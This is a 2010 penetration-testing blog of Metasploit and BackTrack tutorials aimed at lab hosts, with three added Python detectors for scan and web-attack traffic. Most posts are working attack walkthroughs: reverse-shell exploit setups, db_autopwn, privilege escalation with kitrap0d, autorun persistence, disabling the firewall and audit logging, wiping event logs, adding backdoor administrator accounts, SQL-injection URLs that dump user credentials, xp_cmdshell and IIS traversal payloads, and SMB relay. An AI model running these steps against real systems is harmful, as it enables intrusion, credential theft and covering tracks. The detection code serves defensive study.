Monday, December 6, 2010

OpenVAS Client & Server Connection

OpenVAS Vulnerability Scanner is one of the world's most advanced open-source vulnerability scanners available today. For various reasons, you may find that the OpenVAS server (openvassd) does not run as expected after loading all plugins.

To check the OpenVAS client and server connection, issue this command:

root@bt:/usr/local/sbin# lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
cupsd 5491 root 2u IPv4 18281 TCP localhost:ipp (LISTEN)
nessusd 5759 root 4u IPv4 18917 TCP *:nessus (LISTEN)
nessusd 5759 root 6u IPv6 18920 TCP *:nessus (LISTEN)
nessusd 5759 root 8u IPv4 19018 TCP *:8834 (LISTEN)
dhclient 6245 root 5u IPv4 22498 UDP *:bootpc
openvassd 30053 root 4u IPv6 61325 TCP *:9390 (LISTEN)
OpenVAS-C 30065 root 5u IPv4 61625 TCP localhost:52713->localhost:9390 (ESTABLISHED)
openvassd 30069 root 6u IPv6 61346 TCP localhost:9390->localhost:52713 (ESTABLISHED)

OpenVAS server listens on TCP port 9390 by default.
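A small parser for the lsof -i output above makes the same check repeatable: it confirms that openvassd is listening on TCP 9390 and lists the client processes that have an established connection to it. This is an added example, not code from the original post or from the OpenVAS project; the column layout it expects (with an optional SIZE column, which older lsof builds leave empty) is an assumption based on the output shown.

```python
"""Verify a scanner daemon's listener from `lsof -i` output.

Added example, not part of the original post: it parses the lsof -i text
shown above, checks that a daemon (openvassd by default) is listening on the
expected TCP port (9390), and lists the client processes with an established
connection to it. The sample below is copied from the output above.
"""
import re
from typing import Dict, List, NamedTuple, Optional, Set


class LsofEntry(NamedTuple):
    command: str
    pid: int
    user: str
    proto: str            # "TCP" or "UDP" (the NODE column)
    name: str             # "*:9390" or "localhost:52713->localhost:9390"
    state: Optional[str]  # "LISTEN", "ESTABLISHED" or None (UDP)


# COMMAND PID USER FD TYPE DEVICE [SIZE] NODE NAME [(STATE)]
# Older lsof builds leave SIZE empty, so that column is optional.
_LINE = re.compile(
    r"^(?P<cmd>\S+)\s+(?P<pid>\d+)\s+(?P<user>\S+)\s+\S+\s+\S+\s+\S+\s+"
    r"(?:\S+\s+)?(?P<proto>TCP|UDP)\s+(?P<name>\S+)"
    r"(?:\s+\((?P<state>[A-Z_]+)\))?\s*$"
)


def parse_lsof(text: str) -> List[LsofEntry]:
    """Parse lsof -i output; the header and unparseable lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if m:
            entries.append(LsofEntry(m["cmd"], int(m["pid"]), m["user"],
                                     m["proto"], m["name"], m["state"]))
    return entries


def listening_ports(entries: List[LsofEntry], command: str) -> Set[str]:
    """Ports a command listens on. lsof prints service names from
    /etc/services (e.g. 'nessus') when it knows them, so ports are strings."""
    return {e.name.rsplit(":", 1)[1]
            for e in entries if e.command == command and e.state == "LISTEN"}


def clients_of(entries: List[LsofEntry], port: str) -> List[LsofEntry]:
    """Client-side sockets whose remote endpoint is the given port."""
    hits = []
    for e in entries:
        if e.state != "ESTABLISHED" or "->" not in e.name:
            continue
        _local, remote = e.name.split("->", 1)
        if remote.rsplit(":", 1)[1] == port:
            hits.append(e)
    return hits


def check_service(text: str, command: str = "openvassd",
                  port: str = "9390") -> Dict[str, object]:
    """Summarise whether `command` listens on `port` and who is connected."""
    entries = parse_lsof(text)
    return {
        "listening": port in listening_ports(entries, command),
        "clients": [(e.command, e.pid) for e in clients_of(entries, port)],
    }


# Sample taken from the lsof -i output in the post above.
SAMPLE = """\
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
cupsd 5491 root 2u IPv4 18281 TCP localhost:ipp (LISTEN)
nessusd 5759 root 4u IPv4 18917 TCP *:nessus (LISTEN)
nessusd 5759 root 6u IPv6 18920 TCP *:nessus (LISTEN)
nessusd 5759 root 8u IPv4 19018 TCP *:8834 (LISTEN)
dhclient 6245 root 5u IPv4 22498 UDP *:bootpc
openvassd 30053 root 4u IPv6 61325 TCP *:9390 (LISTEN)
OpenVAS-C 30065 root 5u IPv4 61625 TCP localhost:52713->localhost:9390 (ESTABLISHED)
openvassd 30069 root 6u IPv6 61346 TCP localhost:9390->localhost:52713 (ESTABLISHED)
"""

if __name__ == "__main__":
    print(check_service(SAMPLE))
```

On the sample above the check reports the listener as present and OpenVAS-C (PID 30065) as its only client; pipe `lsof -i` into `check_service` to run it against a live host.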

Tuesday, November 23, 2010

PenTest Challenge (131.107.1.250)

Solutions

1. MS-DNS RPC Vulnerability (MS07-029)

msf > use windows/dcerpc/ms07_029_msdns_zonename
msf exploit(ms07_029_msdns_zonename) > set RHOST 131.107.1.250
RHOST => 131.107.1.250
msf exploit(ms07_029_msdns_zonename) > set LHOST 131.107.1.252
LHOST => 131.107.1.252
msf exploit(ms07_029_msdns_zonename) > set LPORT 443
LPORT => 443
msf exploit(ms07_029_msdns_zonename) > set TARGET 0
TARGET => 0
msf exploit(ms07_029_msdns_zonename) > exploit

2. SQL Injection Vulnerability in Joomla Component (Amblog)

Link: http://www.exploit-db.com/exploits/14596/

http://131.107.1.250/joomla/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20@@version

http://131.107.1.250/joomla/index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users

Monday, November 22, 2010

IDS Testing (Samples)

TEST-BT4 = 131.107.1.252, DEN-WEB1 = 131.107.1.101, DEN-WEB2 = 131.107.1.254, LON-IDS1 = 131.107.1.126

From TEST-BT4, launch these commands:

Anomaly Test
ping -s 65000 131.107.1.254

Port Scan Tests
nmap -sS 131.107.1.254
hping2 --scan 80,135,443,445 -S 131.107.1.254

Web Attack Tests
http://131.107.1.254/robots.txt
http://131.107.1.126/robots.txt

http://131.107.1.254/.htaccess
http://131.107.1.126/.htaccess

IIS Unicode Directory Traversal Attack Tests
http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

MS-SQL Injection Tests
http://131.107.1.101/index.asp?newscode=1'
http://131.107.1.101/index.asp?newscode=1 having 1=1 --
http://131.107.1.101/index.asp?newscode=1 group by newsid having 1=1 --
http://131.107.1.101/index.asp?newscode=1 group by newsid,newsdesc having 1=1 --
http://131.107.1.101/index.asp?newscode=1;update newstable1 set newsdesc='HACKED!' where newsid=1;--
http://131.107.1.101/index.asp?newscode=1;exec master..xp_cmdshell 'dir c:\';--

Exploit Test
cd /pentest/exploits/framework3
./msfconsole

msf > use windows/dcerpc/ms03_026_dcom
msf > set PAYLOAD windows/shell/reverse_tcp
msf > set RHOST 131.107.1.254
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit

Evading IDS Detection using Slow/Sneaky Scan Test
nmap -sS -PN -p80,443 -T1 131.107.1.254
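From the IDS side, the web attack, IIS Unicode traversal and MS-SQL injection tests above, together with the Joomla UNION SELECT request from the PenTest Challenge post, all leave recognisable traces in the web server's access log. The following rule set, an added example and not code from the original post or any IDS product, runs over constructed log lines shaped like those requests. Its one non-obvious point is decoding: the `..%255c` traversal is double-encoded, so the path has to be percent-decoded more than once before a `..\` check can see it, and the encoded percent sign is itself worth flagging. The log lines, client address and rule names are all invented for the example.

```python
"""Signature checks for web-server access logs.

Added example, not part of the original post. It runs a handful of
detection rules over constructed access-log lines that mirror the requests
in the Web Attack, IIS Unicode Directory Traversal and MS-SQL Injection
tests above, and the Joomla UNION SELECT request from the PenTest Challenge
post. Log lines, client address and rule names are all invented here.
"""
import re
from urllib.parse import unquote
from typing import List, Tuple

# Combined-log-format line: client, request line, status.
_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# An encoded percent sign (%25xx) in the raw path is the double-encoding
# trick the IIS traversal relies on; it is checked before decoding.
_DOUBLE_ENC = re.compile(r"%25[0-9a-f]{2}", re.I)

# Rules applied to the fully decoded path. robots.txt is also fetched by
# legitimate crawlers, so that rule is a reconnaissance indicator to be
# tuned per site rather than an attack on its own.
RULES = [
    ("sensitive-file-probe", re.compile(r"/(robots\.txt|\.htaccess)$", re.I)),
    ("dir-traversal",        re.compile(r"\.\./|\.\.\\")),
    ("cmd-exec",             re.compile(r"cmd\.exe|xp_cmdshell", re.I)),
    ("sql-injection",        re.compile(
        r"union\s+select|having\s+1=1|group\s+by\s+\w+|;\s*(update|exec)\s|@@version|'\s*(--|$)",
        re.I)),
]


def fully_decode(path: str, rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded by rounds).
    '..%255c' decodes to '..%5c' and only on the second pass to '..\\', so a
    single unquote() would leave the traversal hidden."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify(raw_path: str) -> List[str]:
    """Names of the rules a request path trips, in RULES order."""
    tags = ["double-encoding"] if _DOUBLE_ENC.search(raw_path) else []
    decoded = fully_decode(raw_path)
    tags += [name for name, rx in RULES if rx.search(decoded)]
    return tags


def scan_log(lines) -> List[Tuple[str, str, List[str]]]:
    """Return (client, raw path, tags) for every request that matched a rule."""
    alerts = []
    for line in lines:
        m = _LOG.match(line)
        if not m:
            continue
        tags = classify(m["path"])
        if tags:
            alerts.append((m["ip"], m["path"], tags))
    return alerts


# Constructed log lines; paths follow the test requests in the post.
LOG_LINES = [
    '10.0.0.7 - - [22/Nov/2010:10:01:02 +0800] "GET /index.html HTTP/1.1" 200 1043',
    '10.0.0.7 - - [22/Nov/2010:10:01:05 +0800] "GET /robots.txt HTTP/1.1" 404 211',
    '10.0.0.7 - - [22/Nov/2010:10:01:09 +0800] "GET /.htaccess HTTP/1.1" 403 199',
    '10.0.0.7 - - [22/Nov/2010:10:02:11 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 500 0',
    '10.0.0.7 - - [22/Nov/2010:10:03:40 +0800] "GET /index.asp?newscode=1%27 HTTP/1.1" 500 322',
    '10.0.0.7 - - [22/Nov/2010:10:03:44 +0800] "GET /index.asp?newscode=1%20having%201=1%20-- HTTP/1.1" 500 322',
    '10.0.0.7 - - [22/Nov/2010:10:03:58 +0800] "GET /index.asp?newscode=1;exec%20master..xp_cmdshell%20%27dir%20c:\\%27;-- HTTP/1.1" 500 322',
    '10.0.0.7 - - [22/Nov/2010:10:05:00 +0800] "GET /joomla/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20@@version HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for ip, path, tags in scan_log(LOG_LINES):
        print(ip, ",".join(tags), path)
```

Running it over the constructed lines flags seven of the eight requests; the plain `/index.html` fetch is the only one left alone. The traversal line collects three tags (double encoding, traversal and cmd.exe), which is the kind of stacked signal worth escalating ahead of a lone robots.txt probe.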
Monday, November 15, 2010

Metasploit Autopwn with Nessus

Use SQLite3 database driver
msf > db_driver sqlite3

Create "pentest" database
msf > db_create pentest

Import Nessus scan result
msf > db_import /tmp/131_107_1_101_scan.nessus

Display matching exploit modules
msf > db_autopwn -t -x

Launch matching exploits
msf > db_autopwn -e -x -r

Display open sessions
msf > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:34013 -> 131.107.1.101:1063
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:14816 -> 131.107.1.101:1064
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:20971 -> 131.107.1.101:1065
4 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:5517 -> 131.107.1.101:1066
5 meterpreter x86/win32 DEN-WEB1\IUSR_MICROSOF-3UK0WZ @ DEN-WEB1 131.107.1.252:8837 -> 131.107.1.101:1068

msf > sessions -l

msf > sessions -i 1

Tuesday, September 28, 2010

Tutorial: Exploiting IE with Windows Animated Cursor Vulnerability (MS07-017)

Local Host: 192.168.1.252/24 (TEST-BT4)
Target Host: 192.168.1.50/24 (LON-CL1)

Step 1: Create a resource file in the /sources directory

root@bt:~# nano /sources/ie_ani

Enter the following as the contents of the ie_ani file.

use windows/browser/ms07_017_ani_loadimage_chunksize
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.252
set SRVPORT 80
set LHOST 192.168.1.252
set LPORT 443
set URIPATH /you_win
exploit

Press Ctrl-X and Y, then press Enter to save the file.

Step 2: Launch Metasploit from its working directory

root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole -r /sources/ie_ani

resource (/sources/ie_ani)> use windows/browser/ms07_017_ani_loadimage_chunksize
resource (/sources/ie_ani)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/sources/ie_ani)> set SRVHOST 192.168.1.252
SRVHOST => 192.168.1.252
resource (/sources/ie_ani)> set SRVPORT 80
SRVPORT => 80
resource (/sources/ie_ani)> set LHOST 192.168.1.252
LHOST => 192.168.1.252
resource (/sources/ie_ani)> set LPORT 443
LPORT => 443
resource (/sources/ie_ani)> set URIPATH /you_win
URIPATH => /you_win
resource (/sources/ie_ani)> exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.252:443
[*] Using URL: http://192.168.1.252:80/you_win
[*] Server started.

Step 3: Launch Internet Explorer (IE) on your target machine

Type the following in the URL:

http://192.168.1.252/you_win

Switch back to your machine and check whether the connection from the target has arrived.
Once connected, you can interact with Meterpreter.

msf exploit(ms07_017_ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize

[*] Sending HTML page to 192.168.1.50:1162...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.1.50:1162...
[*] Sending stage (748544 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.252:443 -> 192.168.1.50:1163) at Wed Sep 29 12:08:22 +0800 2010

Press Enter to check the opened sessions.

msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter LON-CL1\testuser @ LON-CL1 192.168.1.252:443 -> 192.168.1.50:1163

msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: LON-CL1
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:d3:6a:60
IP Address : 192.168.1.50
Netmask : 255.255.255.0

Check our privilege level
meterpreter > getuid
Server username: LON-CL1\testuser

meterpreter > getprivs

============================================================
Enabled Process Privileges
============================================================
SeShutdownPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege

meterpreter > upload /tmp/hacked.txt C:\\WINDOWS\\System32
[*] uploading : /tmp/hacked.txt -> C:\WINDOWS\System32
[-] core_channel_open: Operation failed: 5

Escalate our privileges
meterpreter > run kitrap0d
[*] Currently running as LON-CL1\testuser

[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\DOCUME~1\testuser\LOCALS~1\Temp\LnZbxqeuZgMB.exe...
[*] Uploading vdmallowed to C:\DOCUME~1\testuser\LOCALS~1\Temp\vdmexploit.dll...
[*] Escalating our process (PID:1316)...

--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- taviso@sdf.lonestar.org ---


[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x285ee bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 180
[?] OpenProcess(180) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7d4, INFINITE);
[?] GetExitCodeThread(0x7d4, 0012FF44); => 0x77303074
[+] The exploit thread reports exploitation was successful
[+] w00t! You can now use the shell opened earlier

[*] Deleting files...
[*] Now running as NT AUTHORITY\SYSTEM

meterpreter > getprivs

============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeTcbPrivilege
SeCreateTokenPrivilege
SeAssignPrimaryTokenPrivilege
SeLockMemoryPrivilege
SeIncreaseQuotaPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege
SeManageVolumePrivilege

meterpreter > upload /tmp/hacked.txt C:\\WINDOWS\\System32
[*] uploading : /tmp/hacked.txt -> C:\WINDOWS\System32
[*] uploaded : /tmp/hacked.txt -> C:\WINDOWS\System32\hacked.txt

Maintain access by uploading Meterpreter agent
meterpreter > run persistence -h

OPTIONS:

-A Automatically start a matching multi/handler to connect to the agent
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i The interval in seconds between each connection attempt
-p The port on the remote host where Metasploit is listening
-r The IP of the system running Metasploit listening for the connect back


[-] Error in script: LocalJumpError unexpected return

meterpreter > run persistence -A -X -p 443 -r 192.168.1.252
[*] Creating a persistent agent: LHOST=192.168.1.252 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 613927 bytes long
[*] Uploaded the persistent agent to C:\DOCUME~1\testuser\LOCALS~1\Temp\NooAHDFfrAL.vbs
[*] Agent executed with PID 1732
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NaPNlcSlsZRpqA
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NaPNlcSlsZRpqA
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/LON-CL1_20100929.2413/clean_up__20100929.2413.rc

Exit from the target system.

meterpreter > exit

Step 4: Create a listener on our machine

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.252
LHOST => 192.168.1.252
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.252:443
[*] Starting the payload handler...
[*] Sending stage (748544 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.252:443 -> 192.168.1.50:1176) at Wed Sep 29 12:30:27 +0800 2010

Clearing tracks (housekeeping)
meterpreter > run disable_audit

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > run getcountermeasure -h

Getcountermeasure -- List (or optionally, kill) HIPS and AV
processes, show XP firewall rules, and display DEP and UAC
policies

OPTIONS:

-d Disable built in Firewall
-h Help menu.
-k Kill any AV, HIPS and Third Party Firewall process found.

meterpreter > run getcountermeasure -d
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration (current):
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Internal firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] External firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] Disabling Built in Firewall.....
[*] Checking DEP Support Policy...

meterpreter > clearev

[*] Wiping 942 records from Application...
[*] Wiping 1984 records from System...
[*] Wiping 1 records from Security...

Enabling and Accessing Remote Desktop
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20100929.3437.rc

meterpreter > shell

Process 820 created.
Channel 18 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\testuser\Desktop>net user hacker P@ssw0rd /add
net user hacker P@ssw0rd /add
The command completed successfully.

C:\Documents and Settings\testuser\Desktop>net localgroup administrators hacker /add
net localgroup administrators hacker /add
The command completed successfully.


C:\Documents and Settings\testuser\Desktop>^C
Terminate channel 18? [y/N] y

meterpreter > ipconfig


MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:d3:6a:60
IP Address : 192.168.1.50
Netmask : 255.255.255.0

meterpreter >

Remote Desktop Connection

Open a new shell console, and run Remote Desktop client to connect to the target machine.

root@bt:~# rdesktop 192.168.1.50
WARNING: Remote desktop does not support colour depth 24; falling back to 16

Tutorial: NTLM Authentication Hijack with SMB Relay

Local Host: 192.168.1.252 (BackTrack 4 with Metasploit 3.x)
Target Host: 192.168.1.50 (Windows XP SP2 English)

Step 1: Prepare the SMB Exploit on Local Host

cd /pentest/exploits/msf3
./msfconsole

msf > use windows/smb/smb_relay

msf > set PAYLOAD windows/shell/reverse_tcp
msf > set SRVHOST 192.168.1.252
msf > set LHOST 192.168.1.252
msf > set LPORT 443
msf > exploit

Step 2: Connect to the FAKE shared folder from the remote machine

\\192.168.1.252\shared\xxx.jpg

shared\xxx.jpg is a fake link

Step 3: Interact with the open session

Wait until the connection from the target machine arrives.
Once connected, wait a few minutes, then press Enter.

Check the active sessions
msf > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell 192.168.1.252:443 -> 192.168.1.50:1118

Interact with active session 1
msf > sessions -i 1

[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Monday, September 27, 2010

Tutorial: Metasploit Basic Usage

Change directory to /pentest/exploits/framework3

cd /pentest/exploits/framework3

Launch MSF Console (Command Line Interface)

./msfconsole

Interact with MSF Console

Display help
msf > help

Search for a specific pattern
msf > search iis

Display information about the exploit module
msf > info windows/iis/ms01_023_printer

Select and use the exploit module
msf > use windows/iis/ms01_023_printer

Display all available payloads
msf > show payloads

Select and use a specific payload
msf > set PAYLOAD windows/shell/bind_tcp

Set the Remote Host (RHOST)
msf > set RHOST 131.107.1.101

Set the Listening port (LPORT)
msf > set LPORT 8888

Launch the exploit module
msf > exploit

[*] Started bind handler
[*] Sending stage (240 bytes) to 131.107.1.101
[*] Command shell session 1 opened (131.107.1.252:57346 -> 131.107.1.101:8888) at Tue Sep 28 12:17:55 +0800 2010

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

Test privilege level by writing a file
C:\WINNT\system32>echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt

Create a user account and add it as a member of Local Administrators group
C:\WINNT\system32>net user hacker password123 /add
net user hacker password123 /add
The command completed successfully.

C:\WINNT\system32>net localgroup administrators hacker /add
net localgroup administrators hacker /add
The command completed successfully.

CEH - Port Scans Exercise

Tester : TEST-BT4 (RAM = 512MB)
Targets: DEN-WEB1 (RAM = 128MB), DEN-WEB2 (RAM = 128MB), DEN-WEB3 (RAM = 128MB), DEN-SVR1 (RAM = 256MB)

Step 1:
Start all virtual machines.

Step 2:
Log on to TEST-BT4 with username root and password toor.

Step 3:
Check your virtual machine settings.
All network interfaces should be configured as Host-only.

To configure the network interface cards, type these commands:

ifconfig eth0 up
ifconfig eth0 131.107.1.252/24
ifconfig eth1 up
ifconfig eth1 192.168.1.252/24
ifconfig
startx

Step 4: Open a bash console and start scanning with Nmap. Scan all active hosts.

Host Discovery
nmap -sP 131.107.1.0/24 192.168.1.0/24

Port Scans
nmap 131.107.1.0/24
nmap 131.107.1.101

nmap -sS -sV -O 131.107.1.101
nmap -A 131.107.1.101
nmap -sU -sV 131.107.1.101
nmap -sS -p80,443 131.107.1.101
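The scans in this exercise, and the port scan and slow-scan tests in the "IDS Testing (Samples)" post above, are what a sensor on the target segment should raise alerts for. The detector below is an added example, not code from the original post or from Nmap, and works over constructed sensor events: an oversized ICMP echo (the `ping -s 65000` anomaly), a SYN scan that touches ten ports in under a second, a `-T1`-style scan that probes one port every 15 seconds, and a benign client repeatedly hitting port 80. It counts distinct destination ports per source/destination pair inside a sliding time window, and shows why the window length decides whether the slow scan is caught. Event format, thresholds and addresses are assumptions made for the example.

```python
"""Port-scan and oversized-ICMP detection over constructed sensor events.

Added example, not part of the original post. The events imitate what a
network sensor would log for the IDS tests in the "IDS Testing (Samples)"
post (ping -s 65000, nmap -sS / hping2 --scan, and the slow nmap -T1 scan)
and for the Nmap scans in the CEH exercise above. Event format, thresholds
and the benign traffic are all assumptions made for this example.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class Event:
    ts: float      # seconds
    src: str
    dst: str
    proto: str     # "tcp" or "icmp"
    dport: int     # 0 for icmp
    size: int = 0  # ICMP payload bytes


def oversized_icmp(events: List[Event], max_payload: int = 1472) -> List[Event]:
    """ICMP echo requests larger than fit in one Ethernet frame
    (1500 - 20 IP - 8 ICMP). 'ping -s 65000' is fragmented on the wire,
    so this assumes the sensor reports the reassembled datagram size."""
    return [e for e in events if e.proto == "icmp" and e.size > max_payload]


def port_scans(events: List[Event], window: float,
               min_ports: int) -> List[Tuple[Tuple[str, str], int]]:
    """Flag (src, dst) pairs that probe at least min_ports distinct TCP ports
    within any span of `window` seconds. A short window catches nmap -sS and
    hping2 --scan; the -T1 scan waits about 15 s between probes, so it only
    shows up with a window of minutes. Returns the pair and the largest
    number of distinct ports seen in one window."""
    by_pair: Dict[Tuple[str, str], List[Event]] = defaultdict(list)
    for e in sorted(events, key=lambda ev: ev.ts):
        if e.proto == "tcp":
            by_pair[(e.src, e.dst)].append(e)

    alerts = []
    for pair, evs in by_pair.items():
        counts: Counter = Counter()   # port -> probes inside the window
        lo, best = 0, 0
        for e in evs:
            counts[e.dport] += 1
            while e.ts - evs[lo].ts > window:     # drop probes that aged out
                counts[evs[lo].dport] -= 1
                if counts[evs[lo].dport] == 0:
                    del counts[evs[lo].dport]
                lo += 1
            best = max(best, len(counts))
        if best >= min_ports:
            alerts.append((pair, best))
    return alerts


# Constructed events (addresses follow the lab hosts in the post).
FAST_PORTS = [21, 22, 23, 25, 80, 110, 135, 139, 443, 445]
SLOW_PORTS = [80, 443, 21, 22, 25]
EVENTS = (
    [Event(50.0, "131.107.1.252", "131.107.1.254", "icmp", 0, size=65000)]
    # SYN scan: ten ports in under a second
    + [Event(100.0 + i * 0.1, "131.107.1.252", "131.107.1.254", "tcp", p)
       for i, p in enumerate(FAST_PORTS)]
    # -T1 style scan: one probe every 15 seconds
    + [Event(200.0 + i * 15.0, "131.107.1.252", "131.107.1.101", "tcp", p)
       for i, p in enumerate(SLOW_PORTS)]
    # benign client hitting the web server repeatedly on a single port
    + [Event(300.0 + i, "131.107.1.10", "131.107.1.101", "tcp", 80)
       for i in range(20)]
)

if __name__ == "__main__":
    print("oversized icmp:", [(e.src, e.size) for e in oversized_icmp(EVENTS)])
    print("fast scans    :", port_scans(EVENTS, window=5, min_ports=5))
    print("slow scans    :", port_scans(EVENTS, window=300, min_ports=5))
```

With a 5-second window only the SYN scan is reported; widening the window to 300 seconds also surfaces the slow scan, while the benign client never trips the threshold because it keeps using one port. The trade-off is memory and alert latency: a long window holds more state per pair and reports later, which is exactly what a `-T1` scan is betting on.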

Using Google as Currency Calculator

Did you know that you can use Google as a currency calculator?
Visit http://www.google.com

Type 1 USD to IDR in the Search field.
Result: 1 U.S. dollar = 8 928.57143 Indonesian rupiahs

Google Hacking Database (GHDB)

Want to find some interesting stuff?

Check this out: http://www.hackersforcharity.org/ghdb/

Google Hacking & Web Applications Vulnerabilities

Check http://www.exploit-db.com then browse to Web Applications.

There you can find information on how to locate web application vulnerabilities using Google dorks.

Example:

http://www.exploit-db.com/exploits/15100/
Dork: inurl:"option=com_elite_experts"

Google Hacking Cheat Sheet

Google Hacking Operators (most commonly used operators).

Download here.

Wednesday, September 15, 2010

Tutorial: Exploiting Internet Explorer

Local Host: 131.107.1.252/24 (TEST-BT4)
Target Host: 131.107.1.50/24 (LON-CL1)

Step 1: Create a resource file to be used by Metasploit in /tmp directory

root@bt:~# nano /tmp/exploit

use windows/browser/ms07_017_ani_loadimage_chunksize
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 131.107.1.252
set LHOST 131.107.1.252
set LPORT 443
